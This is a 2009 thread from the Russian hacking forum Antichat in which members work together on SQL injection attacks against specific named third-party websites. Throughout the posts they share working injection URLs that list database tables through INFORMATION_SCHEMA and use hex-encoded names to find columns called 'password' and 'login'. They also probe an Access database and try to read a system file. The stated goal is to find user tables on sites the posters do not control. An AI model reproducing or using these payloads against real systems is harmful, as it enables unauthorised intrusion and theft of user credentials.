Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
14.01.2009, 07:20
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
Сообщение от Octave_Parango
Всем, хай.
Подскажите.
Есть скуля, далее:
=-77+union+select+1,2,3,4,5,6,7,8,9,10--
вываливается ошибка:
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10-- ' at line 4
Я так понимаю я не правильно строю запрос?
Попробовал несколько вариантов, тоже самое.
Подскажите, где косяк?
дай ссыль полную
это скуля
|
|
|
14.01.2009, 07:28
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
мужики, 407 таблиц...помогите найти нужную, плиз
Код:
http://soft.dndz.dp.ua/program.php?id=-781%20UNION%20SELECT%201,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15%20FROM%20INFORMATION_SCHEMA.TABLES%20limit%20392,1%20--
|
|
|
|
14.01.2009, 07:48
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Вот запрос - выдергивает все таблицы, в которых есть колонка "password"
Код:
http://soft.dndz.dp.ua/program.php?id=-781+UNION+SELECT+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA.columns+where+column_name=0x70617373776f7264--
С колонкой - login
Код:
http://soft.dndz.dp.ua/program.php?id=-781+UNION+SELECT+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA.columns+where+column_name=0x6c6f67696e--
Последний раз редактировалось R1dex; 14.01.2009 в 07:59..
|
|
|
|
14.01.2009, 07:53
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
нихрена не пойму, там на сайте есть форум....а где табла с юзерами??? 
Последний раз редактировалось vakula; 14.01.2009 в 08:04..
|
|
|
|
14.01.2009, 08:37
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
Сообщение от R1dex
Там рядом скуля...
Код:
http://cronos.net.ru/database.php?id=4664+union+select+1,unhex(hex(version())),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22--
а как в таком случае прописывать таблу? from users? или в хексе?
|
|
|
|
14.01.2009, 08:48
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
from+users--
|
|
|
|
14.01.2009, 10:21
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Код:
http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+order+by+23&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp
Насколько я помню, в access, в запросе обязательно должна присутствовать таблица.. Вот только ни одну не подобрать...
Последний раз редактировалось R1dex; 14.01.2009 в 10:52..
|
|
|
|
14.01.2009, 10:42
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+union+select+*+f rom+MSysObjects&NWS=NWS&ap=NewsDetail.asp&p=ASP%5C ~Pg0.asp
это Microsoft Access статья https://forum.antichat.ru/showthread.php?t=50550
===== R1dex
И что? Это системная табла и как я вижу - доступ закрыт.
я не видел что ты уже отписался 
Последний раз редактировалось big_BRAT; 14.01.2009 в 10:49..
|
|
|
|
14.01.2009, 10:45
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от big_BRAT
http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+union+select+*+f rom+MSysObjects&NWS=NWS&ap=NewsDetail.asp&p=ASP%5C ~Pg0.asp
И что? Это системная табла и как я вижу - доступ закрыт.
|
|
|
|
14.01.2009, 11:32
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
судя по from user, from password хорошие данные с хорошим префиксом) или в другой дб
rofl продвинутый способ локального инклуда (в серьёз не воспринимать)  _eurashe.eu/RunScript.asp?page=&Article_ID=97+union+select+*+f rom+\boot.ini.lalala&ap=NewsDetail.asp&p=ASP%5C~Pg 0.asp |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
